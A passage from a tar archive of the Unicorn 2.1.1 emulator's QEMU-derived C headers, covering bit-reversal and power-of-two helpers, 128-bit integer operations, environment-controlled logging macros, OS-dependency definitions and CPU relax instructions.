revbit32(uint32_t x) { /* Assign the correct byte position. */ x = bswap32(x); /* Assign the correct nibble position. */ x = ((x & 0xf0f0f0f0u) >> 4) | ((x & 0x0f0f0f0fu) << 4); /* Assign the correct bit position. */ x = ((x & 0x88888888u) >> 3) | ((x & 0x44444444u) >> 1) | ((x & 0x22222222u) << 1) | ((x & 0x11111111u) << 3); return x; } /** * revbit64 - reverse the bits in a 64-bit value. * @x: The value to modify. */ static inline uint64_t revbit64(uint64_t x) { /* Assign the correct byte position. */ x = bswap64(x); /* Assign the correct nibble position. */ x = ((x & 0xf0f0f0f0f0f0f0f0ull) >> 4) | ((x & 0x0f0f0f0f0f0f0f0full) << 4); /* Assign the correct bit position. */ x = ((x & 0x8888888888888888ull) >> 3) | ((x & 0x4444444444444444ull) >> 1) | ((x & 0x2222222222222222ull) << 1) | ((x & 0x1111111111111111ull) << 3); return x; } /* Host type specific sizes of these routines. */ #if ULONG_MAX == UINT32_MAX # define clzl clz32 # define ctzl ctz32 # define clol clo32 # define ctol cto32 # define ctpopl ctpop32 # define revbitl revbit32 #elif ULONG_MAX == UINT64_MAX # define clzl clz64 # define ctzl ctz64 # define clol clo64 # define ctol cto64 # define ctpopl ctpop64 # define revbitl revbit64 #else # error Unknown sizeof long #endif static inline bool is_power_of_2(uint64_t value) { if (!value) { return false; } return !(value & (value - 1)); } /** * Return @value rounded down to the nearest power of two or zero. */ static inline uint64_t pow2floor(uint64_t value) { if (!value) { /* Avoid undefined shift by 64 */ return 0; } return 0x8000000000000000ull >> clz64(value); } /* * Return @value rounded up to the nearest power of two modulo 2^64. * This is *zero* for @value > 2^63, so be careful. */ static inline uint64_t pow2ceil(uint64_t value) { int n = clz64(value - 1); if (!n) { /* * @value - 1 has no leading zeroes, thus @value - 1 >= 2^63 * Therefore, either @value == 0 or @value > 2^63. * If it's 0, return 1, else return 0. */ return !value; } return 0x8000000000000000ull >> (n - 1); } static inline uint32_t pow2roundup32(uint32_t x) { x |= (x >> 1); x |= (x >> 2); x |= (x >> 4); x |= (x >> 8); x |= (x >> 16); return x + 1; } /** * urshift - 128-bit Unsigned Right Shift. * @plow: in/out - lower 64-bit integer. * @phigh: in/out - higher 64-bit integer. * @shift: in - bytes to shift, between 0 and 127. * * Result is zero-extended and stored in plow/phigh, which are * input/output variables. Shift values outside the range will * be mod to 128. In other words, the caller is responsible to * verify/assert both the shift range and plow/phigh pointers. */ void urshift(uint64_t *plow, uint64_t *phigh, int32_t shift); /** * ulshift - 128-bit Unsigned Left Shift. * @plow: in/out - lower 64-bit integer. * @phigh: in/out - higher 64-bit integer. * @shift: in - bytes to shift, between 0 and 127. * @overflow: out - true if any 1-bit is shifted out. * * Result is zero-extended and stored in plow/phigh, which are * input/output variables. Shift values outside the range will * be mod to 128. In other words, the caller is responsible to * verify/assert both the shift range and plow/phigh pointers. */ void ulshift(uint64_t *plow, uint64_t *phigh, int32_t shift, bool *overflow); #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/int128.h������������������������������������������������������������0000664�0000000�0000000�00000012464�14675241067�0017752�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef INT128_H #define INT128_H #include "qemu/bswap.h" #ifdef CONFIG_INT128 typedef __int128_t Int128; static inline Int128 int128_make64(uint64_t a) { return a; } static inline Int128 int128_make128(uint64_t lo, uint64_t hi) { return (__uint128_t)hi << 64 | lo; } static inline uint64_t int128_get64(Int128 a) { uint64_t r = a; assert(r == a); return r; } static inline uint64_t int128_getlo(Int128 a) { return a; } static inline int64_t int128_gethi(Int128 a) { return a >> 64; } static inline Int128 int128_zero(void) { return 0; } static inline Int128 int128_one(void) { return 1; } static inline Int128 int128_2_64(void) { return (Int128)1 << 64; } static inline Int128 int128_exts64(int64_t a) { return a; } static inline Int128 int128_and(Int128 a, Int128 b) { return a & b; } static inline Int128 int128_rshift(Int128 a, int n) { return a >> n; } static inline Int128 int128_add(Int128 a, Int128 b) { return a + b; } static inline Int128 int128_neg(Int128 a) { return -a; } static inline Int128 int128_sub(Int128 a, Int128 b) { return a - b; } static inline bool int128_nonneg(Int128 a) { return a >= 0; } static inline bool int128_eq(Int128 a, Int128 b) { return a == b; } static inline bool int128_ne(Int128 a, Int128 b) { return a != b; } static inline bool int128_ge(Int128 a, Int128 b) { return a >= b; } static inline bool int128_lt(Int128 a, Int128 b) { return a < b; } static inline bool int128_le(Int128 a, Int128 b) { return a <= b; } static inline bool int128_gt(Int128 a, Int128 b) { return a > b; } static inline bool int128_nz(Int128 a) { return a != 0; } static inline Int128 int128_min(Int128 a, Int128 b) { return a < b ? a : b; } static inline Int128 int128_max(Int128 a, Int128 b) { return a > b ? a : b; } static inline void int128_addto(Int128 *a, Int128 b) { *a += b; } static inline void int128_subfrom(Int128 *a, Int128 b) { *a -= b; } static inline Int128 bswap128(Int128 a) { return int128_make128(bswap64(int128_gethi(a)), bswap64(int128_getlo(a))); } #else /* !CONFIG_INT128 */ typedef struct Int128 Int128; #if !(defined(_MSC_VER) && defined(__clang__)) typedef Int128 __int128_t; #endif struct Int128 { uint64_t lo; int64_t hi; }; static inline Int128 int128_make64(uint64_t a) { return (Int128) { a, 0 }; } static inline Int128 int128_make128(uint64_t lo, uint64_t hi) { return (Int128) { lo, hi }; } static inline uint64_t int128_get64(Int128 a) { assert(!a.hi); return a.lo; } static inline uint64_t int128_getlo(Int128 a) { return a.lo; } static inline int64_t int128_gethi(Int128 a) { return a.hi; } static inline Int128 int128_zero(void) { return int128_make64(0); } static inline Int128 int128_one(void) { return int128_make64(1); } static inline Int128 int128_2_64(void) { return (Int128) { 0, 1 }; } static inline Int128 int128_exts64(int64_t a) { return (Int128) { .lo = a, .hi = (a < 0) ? -1 : 0 }; } static inline Int128 int128_and(Int128 a, Int128 b) { return (Int128) { a.lo & b.lo, a.hi & b.hi }; } static inline Int128 int128_rshift(Int128 a, int n) { int64_t h; if (!n) { return a; } h = a.hi >> (n & 63); if (n >= 64) { return int128_make128(h, h >> 63); } else { return int128_make128((a.lo >> n) | ((uint64_t)a.hi << (64 - n)), h); } } static inline Int128 int128_add(Int128 a, Int128 b) { uint64_t lo = a.lo + b.lo; /* a.lo <= a.lo + b.lo < a.lo + k (k is the base, 2^64). Hence, * a.lo + b.lo >= k implies 0 <= lo = a.lo + b.lo - k < a.lo. * Similarly, a.lo + b.lo < k implies a.lo <= lo = a.lo + b.lo < k. * * So the carry is lo < a.lo. */ return int128_make128(lo, (uint64_t)a.hi + b.hi + (lo < a.lo)); } static inline Int128 int128_neg(Int128 a) { #ifdef _MSC_VER uint64_t lo = a.lo; lo = 0 - lo; #else uint64_t lo = (uint64_t)(-a.lo); #endif return int128_make128(lo, ~(uint64_t)a.hi + !lo); } static inline Int128 int128_sub(Int128 a, Int128 b) { return int128_make128(a.lo - b.lo, (uint64_t)a.hi - b.hi - (a.lo < b.lo)); } static inline bool int128_nonneg(Int128 a) { return a.hi >= 0; } static inline bool int128_eq(Int128 a, Int128 b) { return a.lo == b.lo && a.hi == b.hi; } static inline bool int128_ne(Int128 a, Int128 b) { return !int128_eq(a, b); } static inline bool int128_ge(Int128 a, Int128 b) { return a.hi > b.hi || (a.hi == b.hi && a.lo >= b.lo); } static inline bool int128_lt(Int128 a, Int128 b) { return !int128_ge(a, b); } static inline bool int128_le(Int128 a, Int128 b) { return int128_ge(b, a); } static inline bool int128_gt(Int128 a, Int128 b) { return !int128_le(a, b); } static inline bool int128_nz(Int128 a) { return a.lo || a.hi; } static inline Int128 int128_min(Int128 a, Int128 b) { return int128_le(a, b) ? a : b; } static inline Int128 int128_max(Int128 a, Int128 b) { return int128_ge(a, b) ? a : b; } static inline void int128_addto(Int128 *a, Int128 b) { *a = int128_add(*a, b); } static inline void int128_subfrom(Int128 *a, Int128 b) { *a = int128_sub(*a, b); } static inline Int128 bswap128(Int128 a) { return int128_make128(bswap64(int128_gethi(a)), bswap64(int128_getlo(a))); } #endif /* CONFIG_INT128 */ #endif /* INT128_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/log.h���������������������������������������������������������������0000664�0000000�0000000�00000014304�14675241067�0017501�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_LOG_H #define QEMU_LOG_H #define CPU_LOG_TB_OUT_ASM (1 << 0) #define CPU_LOG_TB_IN_ASM (1 << 1) #define CPU_LOG_TB_OP (1 << 2) #define CPU_LOG_TB_OP_OPT (1 << 3) #define CPU_LOG_INT (1 << 4) #define CPU_LOG_EXEC (1 << 5) #define CPU_LOG_PCALL (1 << 6) #define CPU_LOG_TB_CPU (1 << 8) #define CPU_LOG_RESET (1 << 9) #define LOG_UNIMP (1 << 10) #define LOG_GUEST_ERROR (1 << 11) #define CPU_LOG_MMU (1 << 12) #define CPU_LOG_TB_NOCHAIN (1 << 13) #define CPU_LOG_PAGE (1 << 14) /* LOG_TRACE (1 << 15) is defined in log-for-trace.h */ #define CPU_LOG_TB_OP_IND (1 << 16) #define CPU_LOG_TB_FPU (1 << 17) #define CPU_LOG_PLUGIN (1 << 18) /* LOG_STRACE is used for user-mode strace logging. */ #define LOG_STRACE (1 << 19) /* Lock output for a series of related logs. Since this is not needed * for a single qemu_log / qemu_log_mask / qemu_log_mask_and_addr, we * assume that qemu_loglevel_mask has already been tested, and that * qemu_loglevel is never set when qemu_logfile is unset. */ /* Logging functions: */ /* To verbose logging, enable the next line. */ //#define UNICORN_LOGGING // to enable logging #ifdef UNICORN_LOGGING #include <stdint.h> #include <string.h> #include <stdlib.h> #include <stdarg.h> #include <stdio.h> #include <stdbool.h> /** * Reads the @p env_name and tries to parse the value into an uint32_t. * @param env_name The environment variable name to parse. * @return The parsed value. ** 0 in case if the value can not be parsed (or is 0). ** ULONG_MAX if the value is bigger than an uint32_t. */ static inline uint32_t read_and_parse_env(const char* env_name) { uint32_t data = 0; const char* env_data = getenv(env_name); if (env_data != NULL) { char buffer[11] = {0}; // 0xFFFF'FFFF\0 strncpy(buffer, env_data, sizeof(buffer) - 1); data = (uint32_t)strtoul(buffer, NULL, 0); } return data; } /** * Gets the log level by reading it once. * @return The log level. */ static inline uint32_t get_log_level() { static uint64_t log_level = UINT64_MAX; if (log_level == UINT64_MAX) { log_level = read_and_parse_env("UNICORN_LOG_LEVEL"); } return (uint32_t)log_level; } /** * Gets the log detail level by reading it once. * @return The detail log level. */ static inline uint32_t get_log_detail_level() { static uint64_t log_detail_level = UINT64_MAX; if (log_detail_level == UINT64_MAX) { log_detail_level = read_and_parse_env("UNICORN_LOG_DETAIL_LEVEL"); } return (uint32_t)log_detail_level; } /** * Checks if the @p log_level is active. * @param log_level The log level to be checked. * @return True if the log level is active. */ static inline bool is_log_level_active(uint32_t log_level) { const uint32_t active_log_level = get_log_level(); const bool is_active = (active_log_level & log_level) == log_level; return is_active; } /** * Checks if the logging is enabled. * @return True if enabled, else false. */ static inline bool is_logging_enabled() { const bool log_level = get_log_level(); return log_level != 0; } /** * Gets the filename of the caller on given @p detail_level. * @param filename The filename to process on. * @param detail_level The level of detail of the filename. ** 0: Returns an empty string. ** 1: Returns the full filename including it's path. ** 2: Returns just the filename (to shorten the log). * @return always an valid null-terminated string. Do NOT free it. */ static inline const char* const get_detailed_filename(const char* filename, int detail_level) { filename = (filename != NULL) ? filename : ""; const char* resulting_filename = filename; #if (defined(WIN32) || defined(WIN64) || defined(_WIN32) || defined(_WIN64)) const char path_separator = '\\'; #else const char path_separator = '/'; #endif switch (detail_level) { default: case 0: resulting_filename = ""; break; case 1: resulting_filename = filename; break; case 2: resulting_filename = strrchr(filename, path_separator); if (resulting_filename == NULL) { resulting_filename = filename; } else { ++resulting_filename; } break; } return resulting_filename; } /** * Prints the formatted log message with details if enabled. * @param mask The log mask to log on. * @param filename The filename of the caller. * @param line The line number of the caller. * @param fmt Printf-style format string. * @param args optional arguments for the format string. */ static inline void print_log(uint32_t mask, const char* filename, uint32_t line, const char* fmt, ...) { if ((mask & get_log_level()) == 0) { return; } const uint32_t log_detail_level = get_log_detail_level(); if (log_detail_level > 0) { const char* detailed_filename = get_detailed_filename(filename, log_detail_level); printf("[%s:%u] ", detailed_filename, line); } va_list argptr; va_start(argptr, fmt); vfprintf(stdout, fmt, argptr); va_end(argptr); } /** * Logs only if the right log level is set. * @param mask The log mask to log on. * @param fmt Printf-style format string. * @param args optional arguments for the format string. */ #define LOG_MESSAGE(mask, fmt, ...) \ do { \ print_log(mask, __FILE__, __LINE__, fmt, ## __VA_ARGS__); \ } while (0) #else #define LOG_MESSAGE(mask, fmt, ...) /** * Dummy implementation which returns always false. * @return Always false. */ static inline bool is_logging_enabled() { return false; } /** * Dummy implementation which returns always false. * @param level The log level to be checked. * @return Always false. */ static inline bool is_log_level_active(uint32_t level) { (void)level; return false; } #endif /* UNICORN_LOGGING */ /** * Logs only if the right log level is set. * @param mask The log mask to log on. * @param fmt Printf-style format string. * @param args Optional arguments for the format string. */ #define qemu_log_mask(mask, fmt, ...) \ LOG_MESSAGE(mask, fmt, ## __VA_ARGS__) #endif /* QEMU_LOG_H */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/osdep.h�������������������������������������������������������������0000664�0000000�0000000�00000036154�14675241067�0020041�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * OS includes and handling of OS dependencies * * This header exists to pull in some common system headers that * most code in QEMU will want, and to fix up some possible issues with * it (missing defines, Windows weirdness, and so on). * * To avoid getting into possible circular include dependencies, this * file should not include any other QEMU headers, with the exceptions * of config-host.h, config-target.h, qemu/compiler.h, * sysemu/os-posix.h, sysemu/os-win32.h, glib-compat.h and * qemu/typedefs.h, all of which are doing a similar job to this file * and are under similar constraints. * * This header also contains prototypes for functions defined in * os-*.c and util/oslib-*.c; those would probably be better split * out into separate header files. * * In an ideal world this header would contain only: * (1) things which everybody needs * (2) things without which code would work on most platforms but * fail to compile or misbehave on a minority of host OSes * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef QEMU_OSDEP_H #define QEMU_OSDEP_H #include "config-host.h" #ifdef NEED_CPU_H #include "config-target.h" #else #include "exec/poison.h" #endif #include "qemu/compiler.h" struct uc_struct; /* Older versions of C++ don't get definitions of various macros from * stdlib.h unless we define these macros before first inclusion of * that system header. */ #ifndef __STDC_CONSTANT_MACROS #define __STDC_CONSTANT_MACROS #endif #ifndef __STDC_LIMIT_MACROS #define __STDC_LIMIT_MACROS #endif #ifndef __STDC_FORMAT_MACROS #define __STDC_FORMAT_MACROS #endif #ifdef _WIN32 /* as defined in sdkddkver.h */ #ifndef _WIN32_WINNT #define _WIN32_WINNT 0x0600 /* Vista */ #endif /* reduces the number of implicitly included headers */ #ifndef WIN32_LEAN_AND_MEAN #define WIN32_LEAN_AND_MEAN #endif #endif /* enable C99/POSIX format strings (needs mingw32-runtime 3.15 or later) */ #ifdef __MINGW32__ #ifndef __USE_MINGW_ANSI_STDIO #define __USE_MINGW_ANSI_STDIO 1 #endif // __USE_MINGW_ANSI_STDIO #endif #include <stdarg.h> #include <stddef.h> #include <stdbool.h> #include <stdint.h> #include <sys/types.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <inttypes.h> #include <limits.h> #include <unicorn/platform.h> #include <time.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <sys/stat.h> #include <assert.h> /* setjmp must be declared before sysemu/os-win32.h * because it is redefined there. */ #include <setjmp.h> #include <signal.h> #ifdef __OpenBSD__ #include <sys/signal.h> #endif #ifndef _WIN32 #include <sys/wait.h> #else #define WIFEXITED(x) 1 #define WEXITSTATUS(x) (x) #endif #ifdef _WIN32 #include "sysemu/os-win32.h" #endif #ifdef CONFIG_POSIX #include "sys/mman.h" #endif /* * Only allow MAP_JIT for Mojave or later. * * Source: https://github.com/moby/hyperkit/pull/259/files#diff-e6b5417230ff2daff9155d9b15aefae12e89410ec2dca1f59d04be511f6737fcR41 * * But using MAP_JIT causes performance regression for fork() so we only use MAP_JIT on Apple M1. * * Issue: https://github.com/desktop/desktop/issues/12978 */ // Even if we don't have sprr available (mostly in virtual machine), we still need MAP_JIT though there is no // protection enforced. #if defined(__APPLE__) && defined(HAVE_PTHREAD_JIT_PROTECT) && (defined(__arm__) || defined(__aarch64__)) #define USE_MAP_JIT #endif #include <glib_compat.h> #include "qemu/typedefs.h" /* Starting on QEMU 2.5, qemu_hw_version() returns "2.5+" by default * instead of QEMU_VERSION, so setting hw_version on MachineClass * is no longer mandatory. * * Do NOT change this string, or it will break compatibility on all * machine classes that don't set hw_version. */ #define QEMU_HW_VERSION "2.5+" /* * For mingw, as of v6.0.0, the function implementing the assert macro is * not marked as noreturn, so the compiler cannot delete code following an * assert(false) as unused. We rely on this within the code base to delete * code that is unreachable when features are disabled. * All supported versions of Glib's g_assert() satisfy this requirement. */ // Unfortunately, NDK and arm32 also have this problem. #if defined(__MINGW32__ ) || defined(__ANDROID__) || defined(__i386__) || defined(__arm__) #undef assert #define assert(x) g_assert(x) #endif /* * According to waitpid man page: * WCOREDUMP * This macro is not specified in POSIX.1-2001 and is not * available on some UNIX implementations (e.g., AIX, SunOS). * Therefore, enclose its use inside #ifdef WCOREDUMP ... #endif. */ #ifndef WCOREDUMP #define WCOREDUMP(status) 0 #endif /* * We have a lot of unaudited code that may fail in strange ways, or * even be a security risk during migration, if you disable assertions * at compile-time. You may comment out these safety checks if you * absolutely want to disable assertion overhead, but it is not * supported upstream so the risk is all yours. Meanwhile, please * submit patches to remove any side-effects inside an assertion, or * fixing error handling that should use Error instead of assert. */ #ifdef G_DISABLE_ASSERT #error building with G_DISABLE_ASSERT is not supported #endif #ifndef O_LARGEFILE #define O_LARGEFILE 0 #endif #ifndef O_BINARY #define O_BINARY 0 #endif #ifndef MAP_ANONYMOUS #define MAP_ANONYMOUS MAP_ANON #endif #ifndef ENOMEDIUM #define ENOMEDIUM ENODEV #endif #if !defined(ENOTSUP) #define ENOTSUP 4096 #endif #if !defined(ECANCELED) #define ECANCELED 4097 #endif #if !defined(EMEDIUMTYPE) #define EMEDIUMTYPE 4098 #endif #if !defined(ESHUTDOWN) #define ESHUTDOWN 4099 #endif /* time_t may be either 32 or 64 bits depending on the host OS, and * can be either signed or unsigned, so we can't just hardcode a * specific maximum value. This is not a C preprocessor constant, * so you can't use TIME_MAX in an #ifdef, but for our purposes * this isn't a problem. */ /* The macros TYPE_SIGNED, TYPE_WIDTH, and TYPE_MAXIMUM are from * Gnulib, and are under the LGPL v2.1 or (at your option) any * later version. */ /* True if the real type T is signed. */ #define TYPE_SIGNED(t) (!((t)0 < (t)-1)) /* The width in bits of the integer type or expression T. * Padding bits are not supported. */ #define TYPE_WIDTH(t) (sizeof(t) * CHAR_BIT) /* The maximum and minimum values for the integer type T. */ #define TYPE_MAXIMUM(t) \ ((t) (!TYPE_SIGNED(t) \ ? (t)-1 \ : ((((t)1 << (TYPE_WIDTH(t) - 2)) - 1) * 2 + 1))) #ifndef TIME_MAX #define TIME_MAX TYPE_MAXIMUM(time_t) #endif /* HOST_LONG_BITS is the size of a native pointer in bits. */ #if UINTPTR_MAX == UINT32_MAX # define HOST_LONG_BITS 32 #elif UINTPTR_MAX == UINT64_MAX # define HOST_LONG_BITS 64 #else # error Unknown pointer size #endif /* Mac OSX has a <stdint.h> bug that incorrectly defines SIZE_MAX with * the wrong type. Our replacement isn't usable in preprocessor * expressions, but it is sufficient for our needs. */ #if defined(HAVE_BROKEN_SIZE_MAX) && HAVE_BROKEN_SIZE_MAX #undef SIZE_MAX #define SIZE_MAX ((size_t)-1) #endif #ifndef MIN #define MIN(a, b) (((a) < (b)) ? (a) : (b)) #endif #ifndef MAX #define MAX(a, b) (((a) > (b)) ? (a) : (b)) #endif /* Minimum function that returns zero only iff both values are zero. * Intended for use with unsigned values only. */ #ifndef MIN_NON_ZERO #define MIN_NON_ZERO(a, b) ((a) == 0 ? (b) : \ ((b) == 0 ? (a) : (MIN(a, b)))) #endif /* Round number down to multiple */ #define QEMU_ALIGN_DOWN(n, m) ((n) / (m) * (m)) /* Round number up to multiple. Safe when m is not a power of 2 (see * ROUND_UP for a faster version when a power of 2 is guaranteed) */ #define QEMU_ALIGN_UP(n, m) QEMU_ALIGN_DOWN((n) + (m) - 1, (m)) /* Check if n is a multiple of m */ #define QEMU_IS_ALIGNED(n, m) (((n) % (m)) == 0) /* n-byte align pointer down */ #ifdef _MSC_VER #define QEMU_ALIGN_PTR_DOWN(p, n) (QEMU_ALIGN_DOWN((uintptr_t)(p), (n))) #else #define QEMU_ALIGN_PTR_DOWN(p, n) ((typeof(p))QEMU_ALIGN_DOWN((uintptr_t)(p), (n))) #endif /* n-byte align pointer up */ #ifndef _MSC_VER #define QEMU_ALIGN_PTR_UP(p, n) ((typeof(p))QEMU_ALIGN_UP((uintptr_t)(p), (n))) #else #define QEMU_ALIGN_PTR_UP(p, n) QEMU_ALIGN_UP((uintptr_t)(p), (n)) #endif /* Check if pointer p is n-bytes aligned */ #define QEMU_PTR_IS_ALIGNED(p, n) QEMU_IS_ALIGNED((uintptr_t)(p), (n)) /* Round number up to multiple. Requires that d be a power of 2 (see * QEMU_ALIGN_UP for a safer but slower version on arbitrary * numbers); works even if d is a smaller type than n. */ #ifndef ROUND_UP #ifdef _MSC_VER #define ROUND_UP(n, d) (((n) + (d) - 1) & (0 - (0 ? (n) : (d)))) #else #define ROUND_UP(n, d) (((n) + (d) - 1) & -(0 ? (n) : (d))) #endif #endif #ifndef DIV_ROUND_UP #define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d)) #endif /* * &(x)[0] is always a pointer - if it's same type as x then the argument is a * pointer, not an array. */ #define QEMU_IS_ARRAY(x) (!__builtin_types_compatible_p(typeof(x), \ typeof(&(x)[0]))) #ifndef ARRAY_SIZE #ifndef _MSC_VER #define ARRAY_SIZE(x) ((sizeof(x) / sizeof((x)[0])) + \ QEMU_BUILD_BUG_ON_ZERO(!QEMU_IS_ARRAY(x))) #else #define ARRAY_SIZE(x) (sizeof(x) / sizeof(x[0])) #endif #endif void *qemu_try_memalign(size_t alignment, size_t size); void *qemu_memalign(size_t alignment, size_t size); void *qemu_anon_ram_alloc(struct uc_struct *uc, size_t size, uint64_t *align); void qemu_vfree(void *ptr); void qemu_anon_ram_free(struct uc_struct *uc, void *ptr, size_t size); #define QEMU_MADV_INVALID -1 #if defined(CONFIG_MADVISE) #define QEMU_MADV_WILLNEED MADV_WILLNEED #define QEMU_MADV_DONTNEED MADV_DONTNEED #ifdef MADV_DONTFORK #define QEMU_MADV_DONTFORK MADV_DONTFORK #else #define QEMU_MADV_DONTFORK QEMU_MADV_INVALID #endif #ifdef MADV_MERGEABLE #define QEMU_MADV_MERGEABLE MADV_MERGEABLE #else #define QEMU_MADV_MERGEABLE QEMU_MADV_INVALID #endif #ifdef MADV_UNMERGEABLE #define QEMU_MADV_UNMERGEABLE MADV_UNMERGEABLE #else #define QEMU_MADV_UNMERGEABLE QEMU_MADV_INVALID #endif #ifdef MADV_DODUMP #define QEMU_MADV_DODUMP MADV_DODUMP #else #define QEMU_MADV_DODUMP QEMU_MADV_INVALID #endif #ifdef MADV_DONTDUMP #define QEMU_MADV_DONTDUMP MADV_DONTDUMP #else #define QEMU_MADV_DONTDUMP QEMU_MADV_INVALID #endif #ifdef MADV_HUGEPAGE #define QEMU_MADV_HUGEPAGE MADV_HUGEPAGE #else #define QEMU_MADV_HUGEPAGE QEMU_MADV_INVALID #endif #ifdef MADV_NOHUGEPAGE #define QEMU_MADV_NOHUGEPAGE MADV_NOHUGEPAGE #else #define QEMU_MADV_NOHUGEPAGE QEMU_MADV_INVALID #endif #ifdef MADV_REMOVE #define QEMU_MADV_REMOVE MADV_REMOVE #else #define QEMU_MADV_REMOVE QEMU_MADV_INVALID #endif #elif defined(CONFIG_POSIX_MADVISE) #define QEMU_MADV_WILLNEED POSIX_MADV_WILLNEED #define QEMU_MADV_DONTNEED POSIX_MADV_DONTNEED #define QEMU_MADV_DONTFORK QEMU_MADV_INVALID #define QEMU_MADV_MERGEABLE QEMU_MADV_INVALID #define QEMU_MADV_UNMERGEABLE QEMU_MADV_INVALID #define QEMU_MADV_DODUMP QEMU_MADV_INVALID #define QEMU_MADV_DONTDUMP QEMU_MADV_INVALID #define QEMU_MADV_HUGEPAGE QEMU_MADV_INVALID #define QEMU_MADV_NOHUGEPAGE QEMU_MADV_INVALID #define QEMU_MADV_REMOVE QEMU_MADV_INVALID #else /* no-op */ #define QEMU_MADV_WILLNEED QEMU_MADV_INVALID #define QEMU_MADV_DONTNEED QEMU_MADV_INVALID #define QEMU_MADV_DONTFORK QEMU_MADV_INVALID #define QEMU_MADV_MERGEABLE QEMU_MADV_INVALID #define QEMU_MADV_UNMERGEABLE QEMU_MADV_INVALID #define QEMU_MADV_DODUMP QEMU_MADV_INVALID #define QEMU_MADV_DONTDUMP QEMU_MADV_INVALID #define QEMU_MADV_HUGEPAGE QEMU_MADV_INVALID #define QEMU_MADV_NOHUGEPAGE QEMU_MADV_INVALID #define QEMU_MADV_REMOVE QEMU_MADV_INVALID #endif #ifdef _WIN32 #define HAVE_CHARDEV_SERIAL 1 #elif defined(__linux__) || defined(__sun__) || defined(__FreeBSD__) \ || defined(__NetBSD__) || defined(__OpenBSD__) || defined(__DragonFly__) \ || defined(__GLIBC__) #define HAVE_CHARDEV_SERIAL 1 #endif #if defined(__linux__) || defined(__FreeBSD__) || \ defined(__FreeBSD_kernel__) || defined(__DragonFly__) #define HAVE_CHARDEV_PARPORT 1 #endif #if defined(CONFIG_LINUX) #ifndef BUS_MCEERR_AR #define BUS_MCEERR_AR 4 #endif #ifndef BUS_MCEERR_AO #define BUS_MCEERR_AO 5 #endif #endif #if defined(__linux__) && \ (defined(__x86_64__) || defined(__arm__) || defined(__aarch64__) \ || defined(__powerpc64__)) /* Use 2 MiB alignment so transparent hugepages can be used by KVM. Valgrind does not support alignments larger than 1 MiB, therefore we need special code which handles running on Valgrind. */ # define QEMU_VMALLOC_ALIGN (512 * 4096) #elif defined(__linux__) && defined(__s390x__) /* Use 1 MiB (segment size) alignment so gmap can be used by KVM. */ # define QEMU_VMALLOC_ALIGN (256 * 4096) #elif defined(__linux__) && defined(__sparc__) #include <sys/shm.h> # define QEMU_VMALLOC_ALIGN MAX(uc->qemu_real_host_page_size, SHMLBA) #else # define QEMU_VMALLOC_ALIGN uc->qemu_real_host_page_size #endif #ifdef CONFIG_POSIX struct qemu_signalfd_siginfo { uint32_t ssi_signo; /* Signal number */ int32_t ssi_errno; /* Error number (unused) */ int32_t ssi_code; /* Signal code */ uint32_t ssi_pid; /* PID of sender */ uint32_t ssi_uid; /* Real UID of sender */ int32_t ssi_fd; /* File descriptor (SIGIO) */ uint32_t ssi_tid; /* Kernel timer ID (POSIX timers) */ uint32_t ssi_band; /* Band event (SIGIO) */ uint32_t ssi_overrun; /* POSIX timer overrun count */ uint32_t ssi_trapno; /* Trap number that caused signal */ int32_t ssi_status; /* Exit status or signal (SIGCHLD) */ int32_t ssi_int; /* Integer sent by sigqueue(2) */ uint64_t ssi_ptr; /* Pointer sent by sigqueue(2) */ uint64_t ssi_utime; /* User CPU time consumed (SIGCHLD) */ uint64_t ssi_stime; /* System CPU time consumed (SIGCHLD) */ uint64_t ssi_addr; /* Address that generated signal (for hardware-generated signals) */ uint8_t pad[48]; /* Pad size to 128 bytes (allow for additional fields in the future) */ }; #endif int qemu_madvise(void *addr, size_t len, int advice); int qemu_mprotect_rwx(void *addr, size_t size); int qemu_mprotect_none(void *addr, size_t size); #if defined(__HAIKU__) && defined(__i386__) #define FMT_pid "%ld" #elif defined(WIN64) #define FMT_pid "%" PRId64 #else #define FMT_pid "%d" #endif int qemu_get_thread_id(void); #ifdef _WIN32 static inline void qemu_timersub(const struct timeval *val1, const struct timeval *val2, struct timeval *res) { res->tv_sec = val1->tv_sec - val2->tv_sec; if (val1->tv_usec < val2->tv_usec) { res->tv_sec--; res->tv_usec = val1->tv_usec - val2->tv_usec + 1000 * 1000; } else { res->tv_usec = val1->tv_usec - val2->tv_usec; } } #else #define qemu_timersub timersub #endif /** * qemu_getauxval: * @type: the auxiliary vector key to lookup * * Search the auxiliary vector for @type, returning the value * or 0 if @type is not present. */ unsigned long qemu_getauxval(unsigned long type); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/processor.h���������������������������������������������������������0000664�0000000�0000000�00000001310�14675241067�0020730�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (C) 2016, Emilio G. Cota <cota@braap.org> * * License: GNU GPL, version 2. * See the COPYING file in the top-level directory. */ #ifndef QEMU_PROCESSOR_H #define QEMU_PROCESSOR_H #include "qemu/atomic.h" #if defined(__i386__) || defined(__x86_64__) # define cpu_relax() asm volatile("rep; nop" ::: "memory") #elif defined(__aarch64__) # define cpu_relax() asm volatile("yield" ::: "memory") #elif defined(__powerpc64__) /* set Hardware Multi-Threading (HMT) priority to low; then back to medium */ # define cpu_relax() asm volatile("or 1, 1, 1;" \ "or 2, 2, 2;" ::: "memory") #else # define cpu_relax() barrier() #endif #endif 